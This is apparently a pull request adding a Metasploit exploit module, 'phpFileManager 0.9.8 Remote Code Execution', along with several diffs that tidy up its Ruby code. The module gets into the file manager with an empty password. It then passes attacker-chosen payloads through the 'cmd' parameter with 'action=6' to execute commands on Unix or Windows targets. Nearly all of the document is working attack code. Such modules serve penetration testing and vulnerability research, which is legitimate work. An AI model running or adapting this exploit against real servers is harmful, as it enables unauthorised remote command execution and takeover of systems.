### PR TITLE
Add phpFileManager 0.9.8 Remote Code Execution

### DIFF
--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # To push the Enter button
     res = send_request_cgi({
-      'method'	=>	'POST',
+      'method'	=> 'POST',
       'uri' =>	uri,
       'vars_post' => {
         'frame' => '3',

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res.nil?
       vprint_error("#{peer} - Connection timed out")
-      fail_with(Failure::Unknown, "Failed to .")
+      fail_with(Failure::Unknown, "Failed to trigger the Enter button .")
     end
 
     location = res.headers['Location']

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri' =>	uri,
       'vars_post' => {
         'frame' => '3',
-       'pass'  => '' # yep this should be empty
+        'pass'  => '' # yep this should be empty
        }
     })
 
     if res.nil?
       vprint_error("#{peer} - Connection timed out")
-      return :abort
+      fail_with(Failure::Unknown, "Failed to .")
     end
 
     location = res.headers['Location']
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       cookie = res.get_cookies
       cookie
     else
-      vprint_error("#{peer} - Error entering the file manager")
+      fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
       return
     end
   end

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'      => normalize_uri(target_uri.path.to_s),
       'cookie'   => cookie,
       'vars_get' => {
-      'action' => '6',
+        'action' => '6',
         'cmd' => cmd
       }
     })

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res.nil?
       vprint_error("#{peer} - Connection timed out")
-      fail_with(Failure::Unknown, "Failed to trigger the Enter button .")
+      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
     end
 
     location = res.headers['Location']

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -1,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
+      'Description'    => %q{
+         This module exploits a remote code execution vulnerability in phpFileManager
+         0.9.8 which is a filesystem management tool on a single file.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'hyp3rlinx', # initial discovery
+          'Jay Turla' # msf
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37709' ],
+          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'    => 2000,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
+          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => 'Aug 28 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
+      ],self.class)
+  end
+
+  def check
+    cookie = push()
+    txt = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path.to_s),
+      'cookie'   => cookie,
+      'vars_get' => {
+        'action' => '6',
+        'cmd' => 'echo #{txt}'
+      }
+    })
+
+   if res and res.body =~ /txt/
+     return Exploit::CheckCode::Vulnerable
+   end
+   return Exploit::CheckCode::Safe
+  end
+
+  def push
+    uri =  normalize_uri(target_uri.path.to_s)
+
+    # To push the Enter button
+    res = send_request_cgi({
+      'method'	=>	'POST',
+      'uri' =>	uri,
+      'vars_post' => {
+        'frame' => '3',
+       'pass'  => '' # yep this should be empty
+       }
+    })
+
+    if res.nil?
+      vprint_error("#{peer} - Connection timed out")
+      return :abort
+    end
+
+    location = res.headers['Location']
+
+    if res && res.headers && res.code == 302 && location =~ /index.php/
+      print_good("#{peer} - Logged in to the file manager")
+      cookie = res.get_cookies
+      cookie
+    else
+      vprint_error("#{peer} - Error entering the file manager")
+      return
+    end
+  end
+
+  def http_send_command(cmd)
+    cookie = push()
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path.to_s),
+      'cookie'   => cookie,
+      'vars_get' => {
+      'action' => '6',
+        'cmd' => cmd
+      }
+    })
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "Failed to execute the command.")
+    end
+    res
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+  end
+end

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -67,10 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-   if res and res.body =~ /txt/
-     return Exploit::CheckCode::Vulnerable
-   end
-   return Exploit::CheckCode::Safe
+    if res and res.body =~ /txt/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
   end
 
   def push

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
     txt = Rex::Text.rand_text_alpha(8)
     res = http_send_command("echo #{txt}")
 
-    if res and res.body =~ /#{txt}/
+    if res && res.body =~ /#{txt}/
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def push
-    uri =  normalize_uri(target_uri.path.to_s)
+    uri =  normalize_uri(target_uri.path)
 
     # To push the Enter button
     res = send_request_cgi({
@@ -83,15 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "Failed to trigger the Enter button")
     end
 
-    location = res.headers['Location']
-
-    if res && res.headers && res.code == 302 && location =~ /index.php/
+    if res && res.headers && res.code == 302
       print_good("#{peer} - Logged in to the file manager")
       cookie = res.get_cookies
       cookie
     else
       fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
-      return
     end
   end
 
@@ -99,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
     cookie = push()
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path.to_s),
+      'uri'      => normalize_uri(target_uri.path),
       'cookie'   => cookie,
       'vars_get' => {
         'action' => '6',

--- a/modules/exploits/multi/http/phpfilemanager_rce.rb
+++ b/modules/exploits/multi/http/phpfilemanager_rce.rb
@@ -55,22 +55,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    cookie = push()
     txt = Rex::Text.rand_text_alpha(8)
-    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path.to_s),
-      'cookie'   => cookie,
-      'vars_get' => {
-        'action' => '6',
-        'cmd' => 'echo #{txt}'
-      }
-    })
+    res = http_send_command("echo #{txt}")
 
-    if res and res.body =~ /txt/
+    if res and res.body =~ /#{txt}/
       return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
     end
-    return Exploit::CheckCode::Safe
   end
 
   def push


### PR DESCRIPTION
This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file.
- Tested on Ubuntu Ubuntu 14.04 running on Apache Server
- phpFileManager 0.9.8 download link: http://phpfm.sourceforge.net/#downloads
  ![image](https://cloud.githubusercontent.com/assets/3483615/11551756/1fca4f0c-99b7-11e5-9c3a-60be5233f93c.png)
